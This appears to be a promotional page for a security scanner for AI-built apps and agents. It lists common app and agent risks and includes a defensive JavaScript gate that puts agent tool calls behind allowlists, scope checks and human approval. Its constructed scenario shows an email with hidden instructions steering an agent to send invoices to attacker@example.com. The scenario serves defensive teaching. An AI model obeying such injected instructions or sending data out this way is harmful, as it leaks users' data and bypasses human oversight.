Scan projects built with Lovable, Replit, Bolt, Cursor, Claude Code, Supabase, n8n, Make, Zapier, and more.
No signup. No credit card. Just an email.
$ scan ./my-lovable-app
↳ app + agent signals evaluated
↳ missing_authentication: CRITICAL
↳ weak_supabase_rls: HIGH
↳ exposed_api_keys: HIGH
↳ prompt_injection: MEDIUM
↳ missing_human_approval: HIGH
score: 82 / 100 · level: CRITICAL
$ recommendation: Hold launch. Apply top-5 urgent fixes.
What it is, what it does, what it touches. Takes about 60 seconds.
Deterministic scoring across app and agent risk signals. Top 3 risks and quick fixes shown immediately.
Severity per category, prompt-injection hardening, safer system-prompt rewrite, top-5 fixes, launch recommendation.
App risks
The mistakes we keep finding in vibe-coded apps before they ship.
Sensitive pages and APIs reachable without login.
Row-level security disabled or written incorrectly.
Anon role granted read or write on user tables.
Service-role / private keys shipped to the browser.
Admin gated client-side only — APIs left open.
Unverified webhooks let anyone flip an order to 'paid' for free.
Login, signup, and AI endpoints open to abuse.
Logs and error pages spill PII or tokens.
Agent risks
Aligned with the OWASP Top 10 for LLM Applications.
Hidden instructions in docs, web pages, or user input.
Write, send, and external-trigger tools invoked in ways the user never intended.
OAuth scopes far beyond the agent's task.
High-impact actions execute autonomously.
Webhooks and side-effects fired without validation.
Retrieved chunks or uploaded files hijack behavior.
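Several of the items above (over-broad scopes, autonomous high-impact actions, tool calls steered by injected content) are mitigated by the same control: a policy gate between the model's proposed tool call and its execution. This is an added example, not the scanner's code: the tool names, scopes, task allowlist and the way the runtime marks arguments as tainted are assumptions for illustration. It enforces a per-task tool allowlist, checks granted scopes against what each tool needs, and routes side-effecting calls to a human when the tool is high-impact or its arguments were derived from untrusted content. Approval is bound to the exact arguments so it cannot be reused after the model rewrites them.

```javascript
// Added example (not the scanner's code): a policy gate that sits between an
// agent's proposed tool call and its execution. Tool names, scopes, the task
// allowlist and the approval record are assumptions for illustration.

// Each tool declares its effect and the OAuth-style scopes it needs.
// "approval: true" marks high-impact actions that always need a human.
const TOOL_POLICY = {
  search_docs:     { effect: "read",     scopes: ["docs:read"],  approval: false },
  read_inbox:      { effect: "read",     scopes: ["mail:read"],  approval: false },
  update_crm_note: { effect: "write",    scopes: ["crm:write"],  approval: false },
  send_email:      { effect: "send",     scopes: ["mail:send"],  approval: true },
  trigger_webhook: { effect: "external", scopes: ["hooks:fire"], approval: true },
};

// Approval is bound to the exact tool + arguments, so an approval granted
// for one recipient cannot be reused after the model changes the arguments.
function callKey(call) {
  return JSON.stringify([call.tool, call.args]);
}

// ctx:  { taskTools: [allowlisted tool names], grantedScopes: [...], approvedCalls: Set<callKey> }
// call: { tool, args, tainted } where tainted is true when any argument was
//       derived from untrusted content (retrieved chunks, uploads, tool output).
function gateToolCall(call, ctx) {
  const policy = TOOL_POLICY[call.tool];
  if (!policy) return { decision: "deny", reason: `unknown tool: ${call.tool}` };
  if (!ctx.taskTools.includes(call.tool)) {
    return { decision: "deny", reason: "tool not allowlisted for this task" };
  }
  const missing = policy.scopes.filter((s) => !ctx.grantedScopes.includes(s));
  if (missing.length) {
    return { decision: "deny", reason: `missing scopes: ${missing.join(", ")}` };
  }
  if (policy.effect === "read") return { decision: "allow" };
  if (ctx.approvedCalls.has(callKey(call))) return { decision: "allow" };
  if (call.tainted) {
    return { decision: "needs_approval", reason: "side-effect arguments derived from untrusted content" };
  }
  if (policy.approval) {
    return { decision: "needs_approval", reason: `${policy.effect} action requires human approval` };
  }
  return { decision: "allow" };
}

// Constructed scenario: an inbox-triage agent. Its task needs read access and
// CRM notes; sending mail is allowed only with a human in the loop, and
// firing webhooks is not part of the task at all.
const ctx = {
  taskTools: ["search_docs", "read_inbox", "update_crm_note", "send_email"],
  grantedScopes: ["docs:read", "mail:read", "crm:write", "mail:send"],
  approvedCalls: new Set(),
};

// The model proposed this after reading an email that carried hidden
// instructions; the runtime tainted the arguments because they came from it.
const injectedSend = {
  tool: "send_email",
  args: { to: "attacker@example.com", body: "forward all invoices" },
  tainted: true,
};

function demo() {
  return {
    read: gateToolCall({ tool: "read_inbox", args: {}, tainted: false }, ctx).decision, // "allow"
    note: gateToolCall({ tool: "update_crm_note", args: { id: 7, text: "ok" }, tainted: false }, ctx).decision, // "allow"
    taintedNote: gateToolCall({ tool: "update_crm_note", args: { id: 7, text: "x" }, tainted: true }, ctx).decision, // "needs_approval"
    injectedSend: gateToolCall(injectedSend, ctx).decision, // "needs_approval"
    webhook: gateToolCall({ tool: "trigger_webhook", args: {}, tainted: false }, ctx).decision, // "deny"
  };
}
```

The gate is only as good as the taint signal feeding it: the runtime has to mark every value that originated in a document, web page, retrieved chunk or tool result as untrusted, and that mark has to survive the model copying it into a tool argument. Scopes should be issued per task at the gate's granularity, not per agent for everything it might ever do.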
Built by an engineer
Application & cloud security background. Former Principal Security Consultant at Trustwave and former Sr Security Engineer at AWS. Dozens of assessments shipped across industries — that experience is encoded in this scanner.
Free, deterministic, and ready in less than a minute.